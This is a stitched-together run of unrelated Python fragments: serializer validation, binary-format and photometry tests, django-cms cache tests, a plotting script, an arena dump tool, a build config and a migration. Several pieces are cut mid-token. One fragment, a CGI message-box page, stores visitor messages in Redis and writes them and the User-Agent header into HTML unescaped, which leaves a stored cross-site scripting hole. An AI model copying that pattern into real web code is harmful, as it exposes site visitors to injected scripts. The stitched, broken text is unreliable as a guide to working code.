        """
        # item_changed: the request touched one of the item-type keys at all;
        # num_defined: how many of them carry a truthy value.
        item_changed = any(k for k in self.Meta.item_types
                           if k in attrs.keys())
        num_defined = sum(1 for item in self.Meta.item_types
                          if attrs.get(item))
        if item_changed and num_defined != 1:
            message = ('A valid value for exactly one of the following '
                       'parameters must be defined: %s' % ','.join(
                           self.Meta.item_types))
            raise serializers.ValidationError(message)
        return attrs

    def get_item_type(self, obj):
        """Return the name of the first set item-type field, else None."""
        for item_type in self.Meta.item_types:
            if getattr(obj, item_type):
                return item_type
        return
self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_json_org_sample3(self): s = os.path.join(self.smile_dir, 'json-org-sample3.smile') j = os.path.join(self.json_dir, 'json-org-sample3.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_json_org_sample4(self): s = os.path.join(self.smile_dir, 'json-org-sample4.smile') j = os.path.join(self.json_dir, 'json-org-sample4.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_json_org_sample5(self): s = os.path.join(self.smi
le_dir, 'json-org-sample5.smile') j = os.path.join(self.json_dir, 'json-org-sample5.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list):
self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_numbers_int_4k(self): s = os.path.join(self.smile_dir, 'numbers-int-4k.smile') j = os.path.join(self.json_dir, 'numbers-int-4k.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_numbers_int_64k(self): s = os.path.join(self.smile_dir, 'numbers-int-64k.smile') j = os.path.join(self.json_dir, 'numbers-int-64k.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_test1(self): s = os.path.join(self.smile_dir, 'test1.smile') j = os.path.join(self.json_dir, 'test1.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_test2(self): s = 
os.path.join(self.smile_dir, 'test2.smile') j = os.path.join(self.json_dir, 'test2.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) class PySmileTestEncode(unittest.TestCase): def setUp(self): curdir = os.path.dirname(os.path.abspath(__file__)) self.smile_dir = os.path.join(curdir, 'data', 'smile') self.json_dir = os.path.join(curdir, 'data', 'json') def test_json_org_sample1(self): s = os.path.join(self.smile_dir, 'json-org-sample1.smile') j = os.path.join(self.json_dir, 'json-org-sample1.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample2(self): s = os.path.join(self.smile_dir, 'json-org-sample2.smile') j = os.path.join(self.json_dir, 'json-org-sample2.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample3(self): s = os.path.join(self.smile_dir, 'json-org-sample3.smile') j = os.path.join(self.json_dir, 'json-org-sample3.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample4(self): s = os.path.join(self.smile_dir, 'json-org-sample4.smile') j = os.path.join(self.json_dir, 'json-org-sample4.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample5(self): s = os.path.join(self.smile_dir, 
'json-org-sample5.smile') j = os.path.join(self.json_dir, 'json-org-sample5.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_numbers_int_4k(self): s = os.path.join(self.smile_dir, 'numbers-int-4k.smile') j = os.path.join(self.json_dir, 'numbers-int-4k.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_numbers_int_64k(self): s = os.path.join(self.smile_dir, 'numbers-int-64k.smile') j = os.path.join(self.json_dir, 'numbers-int-64k.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_test1(se
"""Plot a 2D NMRPipe spectrum (test.ft2) with three 1D 15N slices overlaid,
saving the result to spectrum_2d.png."""
import nmrglue as ng
import matplotlib.pyplot as plt

# read in data
dic, data = ng.pipe.read("test.ft2")

# find PPM limits along each axis (axis 0 = 15N, axis 1 = 13C)
uc_15n = ng.pipe.make_uc(dic, data, 0)
uc_13c = ng.pipe.make_uc(dic, data, 1)
x0, x1 = uc_13c.ppm_limits()
y0, y1 = uc_15n.ppm_limits()

# plot the spectrum
# Bug fix: a second bare plt.figure() call used to overwrite `fig`
# immediately, leaking one figure and silently discarding figsize=(10, 10).
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(111)
# 20 contour levels, geometrically spaced by a factor of 1.30 from 8.5e4
cl = [8.5e4 * 1.30 ** x for x in range(20)]
ax.contour(data, cl, colors='blue', extent=(x0, x1, y0, y1), linewidths=0.5)

# add 1D slices at three 15N shifts, offset vertically to their own row
x = uc_13c.ppm_scale()
s1 = data[uc_15n("105.52ppm"), :]
s2 = data[uc_15n("115.85ppm"), :]
s3 = data[uc_15n("130.07ppm"), :]
ax.plot(x, -s1 / 8e4 + 105.52, 'k-')
ax.plot(x, -s2 / 8e4 + 115.85, 'k-')
ax.plot(x, -s3 / 8e4 + 130.07, 'k-')

# label the axis and save (axes inverted: ppm decreases left-to-right)
ax.set_xlabel("13C ppm", size=20)
ax.set_xlim(183.5, 167.5)
ax.set_ylabel("15N ppm", size=20)
ax.set_ylim(139.5, 95.5)
fig.savefig("spectrum_2d.png")
#!/usr/bin/env python3
#
# Copyright (c) 2012 Timo Savola
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
"""Inspect a binary memory-arena dump.

Layout (all integers little-endian uint32): offset 0 holds the address of
the first free node; each free node stores [size, next_free_address].
Everything between free nodes (starting at offset 8) is treated as
allocated space.
"""

import argparse
import struct


class Arena(object):
    """A parsed arena image backed by an immutable bytes buffer."""

    class Node(object):
        """Base class for free/allocated regions, ordered by address."""

        def __init__(self, arena, address):
            self.arena = arena
            self.address = address

        def __eq__(self, other):
            # Return NotImplemented for foreign types instead of raising
            # AttributeError on other.address.
            if not isinstance(other, Arena.Node):
                return NotImplemented
            return self.address == other.address

        def __lt__(self, other):
            if not isinstance(other, Arena.Node):
                return NotImplemented
            return self.address < other.address

        def __hash__(self):
            # Defining __eq__ alone would make nodes unhashable on Python 3;
            # hash consistently with equality (same address => same hash).
            return hash(self.address)

        def _uint32(self, offset):
            """Read a uint32 at *offset* relative to this node."""
            return self.arena._uint32(self.address + offset)

        def _data(self, offset, size):
            """Read *size* raw bytes at *offset* relative to this node."""
            return self.arena._data(self.address + offset, size)

        @property
        def end(self):
            """One past the last address covered by this node."""
            return self.address + self.size

    class Allocated(Node):
        """A span of in-use bytes between free nodes."""

        def __init__(self, arena, address, size):
            super(Arena.Allocated, self).__init__(arena, address)
            self.size = size

        def __str__(self):
            return "Allocated space at %u: %r" % (self.address, self.data)

        @property
        def data(self):
            return self._data(0, self.size)

    class Free(Node):
        """A node on the free list; size and link live in the buffer."""

        def __str__(self):
            return "Free space from %u to %u" % (self.address,
                                                 self.address + self.size)

        @property
        def size(self):
            return self._uint32(0)

        @property
        def next_node(self):
            """The next Free node, or None at the end of the list."""
            address = self.next_address
            return self.arena.free_nodes[address] if address else None

        @property
        def next_address(self):
            return self._uint32(4)

    # First usable address: the 8-byte header (free-list head pointer plus
    # padding) precedes all nodes.
    _initial_address = 8

    def __init__(self, data):
        self.data = data

    def init(self):
        """Walk the free list and derive the allocated spans between nodes.

        Populates self.free_nodes and self.allocations (address -> node).
        Raises if a link points outside the buffer; asserts that the free
        list is strictly ascending.
        """
        self.allocations = {}
        self.free_nodes = {}

        if self.size < self._initial_address:
            return  # too small to even hold the header

        last_node = None
        next_addr = self._uint32(0)

        while next_addr:
            # everything between the previous free node (or the header)
            # and this free node is allocated space
            self.__init_allocated(last_node, next_addr)

            node = self.Free(self, next_addr)
            self.free_nodes[node.address] = node

            last_node = node
            next_addr = node.next_address
            assert not next_addr or last_node.address < next_addr

        # trailing allocated span up to the end of the arena
        self.__init_allocated(last_node, self.size)

    def __init_allocated(self, prev_node, end):
        address = prev_node.end if prev_node else self._initial_address
        self.allocations[address] = self.Allocated(self, address,
                                                   end - address)

    @property
    def size(self):
        return len(self.data)

    @property
    def nodes(self):
        """All nodes (allocated and free) keyed by address."""
        nodes = {}
        nodes.update(self.allocations)
        nodes.update(self.free_nodes)
        return nodes

    def dump(self):
        """Print every node in address order."""
        for node in sorted(self.nodes.values()):
            print(node)

    def _uint32(self, address):
        return struct.unpack("<I", self._data(address, 4))[0]

    def _data(self, address, size):
        # Bounds check against the raw buffer; corrupt links land here.
        if address + size > len(self.data):
            raise Exception("address %u size %u out of arena (size %u)" %
                            (address, size, len(self.data)))
        return self.data[address:address+size]


def main():
    """CLI entry point: `prog arena FILE [--dump]`."""
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers()

    arena_parser = subparsers.add_parser("arena")
    arena_parser.set_defaults(func=arena_command)
    arena_parser.add_argument("filename", type=str, metavar="FILE")
    arena_parser.add_argument("--dump", action="store_true")

    args = parser.parse_args()
    args.func(args)


def arena_command(args):
    """Parse the arena file; dump it if requested, then re-raise any
    parse error (so --dump still shows whatever was recovered)."""
    error = None

    with open(args.filename, "rb") as file:
        arena = Arena(file.read())

    try:
        arena.init()
    except Exception as e:
        error = e

    if args.dump:
        arena.dump()

    if error:
        raise error


if __name__ == "__main__":
    main()
kycoord_circ_2['aperture_sum']) photometry_skycoord_ell = aperture_photometry( data, SkyEllipticalAperture(pos_skycoord, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_2 = aperture_photometry( data, SkyEllipticalAperture(pos_skycoord, 2 * u.arcsec, 2.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_s = aperture_photometry( data, SkyEllipticalAperture(pos_skycoord_s, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_ann = aperture_photometry( data, SkyEllipticalAnnulus(pos_skycoord, 2 * u.arcsec, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_ann_s = aperture_photometry( data, SkyEllipticalAnnulus(pos_skycoord_s, 2 * u.arcsec, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) assert_allclose(photometry_skycoord_ell['aperture_sum'][2], photometry_skycoord_ell_s['aperture_sum']) assert_allclose(photometry_skycoord_ell_ann['aperture_sum'][2], photometry_skycoord_ell_ann_s['aperture_sum']) assert_allclose(photometry_skycoord_ell['aperture_sum'], photometry_skycoord_circ['aperture_sum'], rtol=5e-3) assert_allclose(photometry_skycoord_ell_ann['aperture_sum'], photometry_skycoord_ell['aperture_sum'] - photometry_skycoord_ell_2['aperture_sum'], rtol=1e-4) photometry_skycoord_rec = aperture_photometry( data, SkyRectangularAperture(pos_skycoord, 6 * u.arcsec, 6 * u.arcsec, 0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_4 = aperture_photometry( data, SkyRectangularAperture(pos_skycoord, 4 * u.arcsec, 4 * u.arcsec, 0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_s = aperture_photometry( data, SkyRectangularAperture(pos_skycoord_s, 6 * u.arcsec, 6 * u.arcsec, 0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_ann = aperture_photometry( data, SkyRectangularAnnulus(pos_skycoord, 4 * u.arcsec, 6 * u.arcsec, 6 * u.arcsec, theta=0 * 
u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_ann_s = aperture_photometry( data, SkyRectangularAnnulus(pos_skycoord_s, 4 * u.arcsec, 6 * u.arcsec, 6 * u.arcsec, theta=0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) assert_allclose(photometry_skycoord_rec['aperture_sum'][2], photometry_skycoord_rec_s['aperture_sum']) assert np.all(photometry_skycoord_rec['aperture_sum'] > photometry_skycoord_circ['aperture_sum']) assert_allclose(photometry_skycoord_rec_ann['aperture_sum'][2], photometry_skycoord_rec_ann_s['aperture_sum']) assert_allclose(photometry_skycoord_rec_ann['aperture_sum'], photometry_skycoord_rec['aperture_sum'] - photometry_skycoord_rec_4['aperture_sum'], rtol=1e-4) def test_basic_circular_aperture_photometry_unit(): radius = 3 true_flux = np.pi * radius * radius aper = CircularAperture((12, 12), radius) data1 = np.ones((25, 25), dtype=float) table1 = aperture_photometry(data1, aper) assert_allclose(table1['aperture_sum'], true_flux) unit = u.adu data2 = u.Quantity(data1 * unit) table2 = aperture_photometry(data2, aper) assert_allclose(table2['aperture_sum'].value, true_flux) assert table2['aperture_sum'].unit == data2.unit == unit error1 = np.ones((25, 25)) with pytest.raises(ValueError): # dat
a has unit,
but error does not aperture_photometry(data2, aper, error=error1) error2 = u.Quantity(error1 * u.Jy) with pytest.raises(ValueError): # data and error have different units aperture_photometry(data2, aper, error=error2) def test_aperture_photometry_with_error_units(): """Test aperture_photometry when error has units (see #176).""" data1 = np.ones((40, 40), dtype=float) data2 = u.Quantity(data1, unit=u.adu) error = u.Quantity(data1, unit=u.adu) radius = 3 true_flux = np.pi * radius * radius unit = u.adu position = (20, 20) table1 = aperture_photometry(data2, CircularAperture(position, radius), error=error) assert_allclose(table1['aperture_sum'].value, true_flux) assert_allclose(table1['aperture_sum_err'].value, np.sqrt(true_flux)) assert table1['aperture_sum'].unit == unit assert table1['aperture_sum_err'].unit == unit def test_aperture_photometry_inputs_with_mask(): """ Test that aperture_photometry does not modify the input data or error array when a mask is input. """ data = np.ones((5, 5)) aperture = CircularAperture((2, 2), 2.) mask = np.zeros_like(data, dtype=bool) data[2, 2] = 100. # bad pixel mask[2, 2] = True error = np.sqrt(data) data_in = data.copy() error_in = error.copy() t1 = aperture_photometry(data, aperture, error=error, mask=mask) assert_array_equal(data, data_in) assert_array_equal(error, error_in) assert_allclose(t1['aperture_sum'][0], 11.5663706144) t2 = aperture_photometry(data, aperture) assert_allclose(t2['aperture_sum'][0], 111.566370614) TEST_ELLIPSE_EXACT_APERTURES = [(3.469906, 3.923861394, 3.), (0.3834415188257778, 0.3834415188257778, 0.3)] @pytest.mark.parametrize('x,y,r', TEST_ELLIPSE_EXACT_APERTURES) def test_ellipse_exact_grid(x, y, r): """ Test elliptical exact aperture photometry on a grid of pixel positions. This is a regression test for the bug discovered in this issue: https://github.com/astropy/photutils/issues/198 """ data = np.ones((10, 10)) aperture = EllipticalAperture((x, y), r, r, 0.) 
t = aperture_photometry(data, aperture, method='exact') actual = t['aperture_sum'][0] / (np.pi * r ** 2) assert_allclose(actual, 1) @pytest.mark.parametrize('value', [np.nan, np.inf]) def test_nan_inf_mask(value): """Test that nans and infs are properly masked [267].""" data = np.ones((9, 9)) mask = np.zeros_like(data, dtype=bool) data[4, 4] = value mask[4, 4] = True radius = 2. aper = CircularAperture((4, 4), radius) tbl = aperture_photometry(data, aper, mask=mask) desired = (np.pi * radius**2) - 1 assert_allclose(tbl['aperture_sum'], desired) def test_aperture_partial_overlap(): data = np.ones((20, 20)) error = np.ones((20, 20)) xypos = [(10, 10), (0, 0), (0, 19), (19, 0), (19, 19)] r = 5. aper = CircularAperture(xypos, r=r) tbl = aperture_photometry(data, aper, error=error) assert_allclose(tbl['aperture_sum'][0], np.pi * r ** 2) assert_array_less(tbl['aperture_sum'][1:], np.pi * r ** 2) unit = u.MJy / u.sr tbl = aperture_photometry(data * unit, aper, error=error * unit) assert_allclose(tbl['aperture_sum'][0].value, np.pi * r ** 2) assert_array_less(tbl['aperture_sum'][1:].value, np.pi * r ** 2) assert_array_less(tbl['aperture_sum_err'][1:].value, np.pi * r ** 2) assert tbl['aperture_sum'].unit == unit assert tbl['aperture_sum_err'].unit == unit def test_pixel_aperture_repr(): aper = CircularAperture((10, 20), r=3.0) assert '<CircularAperture(' in repr(aper) assert 'Aperture: CircularAperture' in str(aper) aper = CircularAnnulus((10, 20), r_in=3.0, r_out=5.0) assert '<CircularAnnulus(' in repr(aper)
s initially un-cached with self.assertNumQueries(FuzzyInt(1, 20)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # # Test that subsequent requests of the same page are still requires DB # access. # with self.assertNumQueries(FuzzyInt(1, 20)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) def test_no_page_cache_on_toolbar_edit(self): with self.settings(CMS_PAGE_CACHE=True): # Create a test page page1 = create_page('test page 1', 'nav_playground.html', 'en') # Add some content placeholder = page1.placeholders.filter(slot="body")[0] add_plugin(placeholder, "TextPlugin", 'en', body="English") add_plugin(placeholder, "TextPlugin", 'de', body="Deutsch") # Publish page1.publish('en') # Set edit mode session = self.client.session session['cms_edit'] = True session.save() # Make an initial ?edit request with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # Disable edit mode session = self.client.session session['cms_edit'] = False session.save() # Set the cache with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # Assert cached content was used with self.assertNumQueries(0): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # Set edit mode once more session = self.client.session session['cms_edit'] = True session.save() # Assert no cached content was used with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/?edit') self.assertEqual(response.status_code, 200) def test_invalidate_restart(self): # Ensure that we're testing in an environment WITHOUT the MW cache... 
exclude = [ 'django.middleware.cache.UpdateCacheMiddleware', 'django.middleware.cache.FetchFromCacheMiddleware' ] overrides = dict() if getattr(settings, 'MIDDLEWARE', None): overrides['MIDDLEWARE'] = [mw for mw in settings.MIDDLEWARE if mw not in exclude] else: overrides['MIDDLEWARE_CLASSES'] = [mw for mw in settings.MIDDLEWARE_CLASSES if mw not in exclude] with self.settings(**overrides): # Silly to do these tests if this setting isn't True page_cache_setting = get_cms_setting('PAGE_CACHE') self.assertTrue(page_cache_setting) # Create a test page page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) # Add some content placeholder = page1.placeholders.filter(slot="body")[0] add_plugin(placeholder, "TextPlugin", 'en', body="English") add_plugin(placeholder, "TextPlugin", 'de', body="Deutsch") # Create a request object request = self.get_request(page1.get_path(), 'en') # Ensure that user is NOT authenticated self.assertFalse(request.user.is_authenticated()) # Test that the page is initially uncached with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # # Test that subsequent requests of the same page are cached by # asserting that they require fewer queries. 
# with self.assertNumQueries(0): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) old_plugins = plugin_pool.plugins plugin_pool.clear() plugin_pool.discover_plugins() plugin_pool.plugins = old_plugins with self.assertNumQueries(FuzzyInt(1, 20)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) def test_sekizai_plugin(self): page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) placeholder1 = page1.placeholders.filter(slot="body")[0] placeholder2 = page1.placeholders.filter(slot="right-column")[0] plugin_pool.register_plugin(SekizaiPlugin) add_plugin(placeholder1, "SekizaiPlugin", 'en') add_plugin(placeholder2, "TextPlugin", 'en', body="Deutsch") page1.publish('en') response = self.client.get('/en/') self.assertContains(response, 'alert(') response = self.client.get('/en/') self.assertContains(response, 'alert(') def test_cache_invalidation(self): # Ensure that we're testing in an environment WITHOUT the MW cache... exclude = [ 'django.middleware.cache.UpdateCacheMiddleware', 'django.middleware.cache.FetchFromCacheMiddleware' ] overrides = dict() if getattr(settings, 'MIDDLEWARE', None): overrides['MIDDLEWARE'] = [mw for mw in settings.MIDDLEWARE if mw not in exclude] else: overrides['MIDDLEWARE_CLASSES'] = [mw for mw in settings.MIDDLEWARE_CLASSES if mw not in exclude] with self.settings(**overrides): # Silly to do these tests if this setting isn't True page_cache_setting = get_cms_setting('PAGE_CACHE') self.assertTrue(page_cache_setting) page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) placeholder = page1.placeholders.get(slot="body") add_plugin(placeholder, "TextPlugin", 'en', body="First content") page1.publish('en')
response = self.client.get('/en/') self.assertContains(response, 'First c
ontent') response = self.client.get('/en/') self.assertContains(response, 'First content') add_plugin(placeholder, "TextPlugin", 'en', body="Second content") page1.publish('en') response = self.client.get('/en/') self.assertContains(response, 'Second content') def test_render_placeholder_cache(self): """ Regression test for #4223 Assert that placeholder cache is cleared correctly when a plugin is saved """ invalidate_cms_page_cache() ex = Example1( char_1='one', char_2='two', char_3='tree', char_4='four' ) ex.save() ph1 = ex.placeholder ### # add the test plugin ## test_plugin = add_plugin(ph1, u"TextPlugin", u"en", body="Some text") test_plugin.save() request = self.get_request() content_renderer = self.get_content_renderer(request) # asserting initial text context = SekizaiContext() context['cms_content_renderer'] = content_renderer context['request'] = self.get_request() text = content_renderer.render_placeholder(ph1, context) self.assertEqual(text, "Some text") # deleting local plugin cache del ph1._plugins_cache test_plugin.body = 'Other text' test_plugin.save() # plugin text has changed, so the placeholder rendering text = content_renderer.render_placeholder(ph1, context) self.assertEqual(text, "Other text") class PlaceholderCacheTestCase(CMSTestCase): def setUp(self): from django.core.cache import cache super(PlaceholderCacheTestCase, self).setUp() cache.clear() self.page = create_
#!/usr/bin/python import cgi from redis import Connection from socket import gethostname from navi import * fields = cgi.FieldStorage() title = "Message
Box" msg_prefix = 'custom.message.' def insert_msg(cust, tm, msg): conn = Connection(host=gethostname(),port=6379) conn.send_command('set', msg_prefix+cust+'--'+tm, msg) conn.disconnect() def read_msg(): ret = '' conn = Connection(host=gethostname(),port=6379) conn.send_command('keys', msg_prefix+'*') keys = conn.read_response() vals = [] if len(keys) != 0: conn.
send_command('mget', *keys) vals = conn.read_response() ret += "<h2>" + "Message log" + "</h2>" for k, v in zip(keys, vals): ret += "<span>" + k.replace(msg_prefix, '').replace('--', ' ') + "</span>" ret += "<pre readonly=\"true\">" + v + "</pre>" conn.disconnect() ret += "<br>" return ret def reply(): import time, os ret = "" ret += "Content-Type: text/html\n\n" ret += "<!DOCTYPE html>" ret += "<html>" ret += default_head(title) ret += default_navigator() ret += "<body>" ret += "<div class=\"content\">" ret += "<h2>Welcome, " + os.environ["REMOTE_ADDR"] + "!</h2>" ret += "<span>" + os.environ["HTTP_USER_AGENT"] + "</span><br><br>" if fields.has_key('msgbox'): insert_msg(os.environ["REMOTE_ADDR"], time.strftime(time.asctime()), fields['msgbox'].value) ret += read_msg() ret += "</div>" ret += "</body>" ret += "</html>" print ret reply()
# License LGPL-3.0 or later
(http://www.gnu.org/licenses/lgpl). fr
om . import controllers
import struct
import unittest

from zoonado.protocol import response, primitives


class ResponseTests(unittest.TestCase):
    """Unit tests for Response.deserialize()."""

    def test_deserialize(self):
        """A packed Int + UString payload maps onto the declared parts."""

        class FakeResponse(response.Response):
            opcode = 99
            parts = (
                ("first", primitives.Int),
                ("second", primitives.UString),
            )

        # The xid/opcode preamble is consumed by the connection layer before
        # deserialize() ever sees the payload, so it is omitted here.
        payload = struct.pack("!ii6s", 3, 6, b"foobar")

        decoded = FakeResponse.deserialize(payload)

        self.assertEqual(decoded.first, 3)
        self.assertEqual(decoded.second, u"foobar")
import os

# Object directory the build writes into.
MOZ_OBJDIR = 'obj-firefox'

# Mozharness build config for the 64-bit Linux Valgrind job.
config = {
    'default_actions': [
        'clobber',
        'clone-tools',
        'checkout-sources',
        #'setup-mock',
        'build',
        #'upload-files',
        #'sendchange',
        'check-test',
        'valgrind-test',
        #'generate-build-stats',
        #'update',
    ],
    'stage_platform': 'linux64-valgrind',
    'publish_nightly_en_US_routes': False,
    'build_type': 'valgrind',
    'tooltool_manifest_src': 'browser/config/tooltool-manifests/linux64/releng.manifest',
    'platform_supports_post_upload_to_latest': False,
    'enable_signing': False,
    'enable_talos_sendchange': False,
    'perfherder_extra_options': ['valgrind'],
    #### 64 bit build specific #####
    'env': {
        'MOZBUILD_STATE_PATH': os.path.join(os.getcwd(), '.mozbuild'),
        'MOZ_AUTOMATION': '1',
        'DISPLAY': ':2',
        'HG_SHARE_BASE_DIR': '/builds/hg-shared',
        'MOZ_OBJDIR': 'obj-firefox',
        'TINDERBOX_OUTPUT': '1',
        'TOOLTOOL_CACHE': '/builds/tooltool_cache',
        'TOOLTOOL_HOME': '/builds',
        'MOZ_CRASHREPORTER_NO_REPORT': '1',
        'CCACHE_DIR': '/builds/ccache',
        'CCACHE_COMPRESS': '1',
        'CCACHE_UMASK': '002',
        'LC_ALL': 'C',
        ## 64 bit specific
        'PATH': ('/tools/buildbot/bin:/usr/local/bin:/usr/lib64/ccache:/bin:'
                 '/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/tools/git/bin:'
                 '/tools/python27/bin:/tools/python27-mercurial/bin:'
                 '/home/cltbld/bin'),
    },
    'src_mozconfig': 'browser/config/mozconfigs/linux64/valgrind',
    #######################
}
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Drop the audit/bookkeeping columns from TrainessCourseRecord."""

    dependencies = [
        ('training', '0006_auto_20160627_1620'),
    ]

    operations = [
        migrations.RemoveField(model_name='trainesscourserecord', name='approvedby'),
        migrations.RemoveField(model_name='trainesscourserecord', name='createdby'),
        migrations.RemoveField(model_name='trainesscourserecord', name='createtimestamp'),
    ]
""" Proctored Exams Transformer """ from django.conf import settings from edx_proctoring.api import get_attempt_status_summary from edx_proctoring.models import ProctoredExamStudentAttemptStatus from openedx.core.lib.block_structur
